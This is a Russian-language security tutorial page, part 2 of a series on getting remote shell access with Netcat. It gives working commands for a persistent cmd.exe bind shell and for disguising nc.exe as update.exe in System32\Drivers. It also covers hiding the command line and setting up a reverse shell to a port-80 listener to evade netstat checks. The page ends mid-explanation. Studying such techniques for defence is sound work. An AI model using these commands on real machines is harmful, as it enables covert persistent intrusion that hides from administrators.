Инструментальные средства обеспечения безопасности


Получение удаленного доступа к командной оболочке - часть 2


C:\> nc.exe -p 4455 -d -L -e cmd.exe

Это позволяет взломщику возвращаться в систему до тех пор, пока системный администратор не обнаружит работающую программу (nc.exe) в списке выполняющихся задач. Взломщик, правда, может подумать и об этом и переименовать nc.exe как-нибудь так:

C:\>move nc.exe c:\Windows\System32\Drivers\update.exe C:\>Windows\System32\Drivers\update.exe -p 4455 -d -L -e cmd.exe

Системный администратор может не обратить внимания на файл update.exe - это может быть все, что угодно. Взломщик также может скрыть командную строку. Еще одной возможностью Netcat является то, что если вы запускаете его без опций в командной строке, то программа ожидает получения командной строки в первой строчке стандартного ввода.

C:\>Windows\System32\Drivers\update.exe Cmd line: -p 4455 -d -L -e cmd.exe C:\>

Теперь, если системный администратор выполнит команду netstat -a -n в командной строке, то сможет заметить, что нечто выполняется на ранее незанятом порту, присоединиться к порту с использованием telnet и раскрыть фокус. Однако Windows использует множество случайных портов по разному поводу, и вывод программы netstat потребует много времени для анализа, особенно в интенсивно используемой системе.

Взломщик может пытаться использовать различные возможности. Если он, к примеру, проник через сервер Citrix, получил доступ к большому числу пользователей, которые бродили по интернету, то сможет увидеть большое количество запросов к системе DNS (Domain Name System) и интернет-соединений. Выполненная команда netstat -a -n показала бы много исходящих TCP-соединений по 80 порту. Вместо того чтобы запускать экземпляр Netcat на прослушивание на Windows машине и ожидать соединения, Netcat может перенаправлять входной и выходной потоки программы cmd.exe другому экземпляру Netcat, выполняющемуся на другой машине и прослушивающему 80 порт. В этом случае взломщик захочет выполнить следующее:

[root@originix/root]# nc -l -p 80

На Windows-машине взломщик естественно пожелает скрыть присутствие Netcat следующим образом:




- Начало -  - Назад -  - Вперед -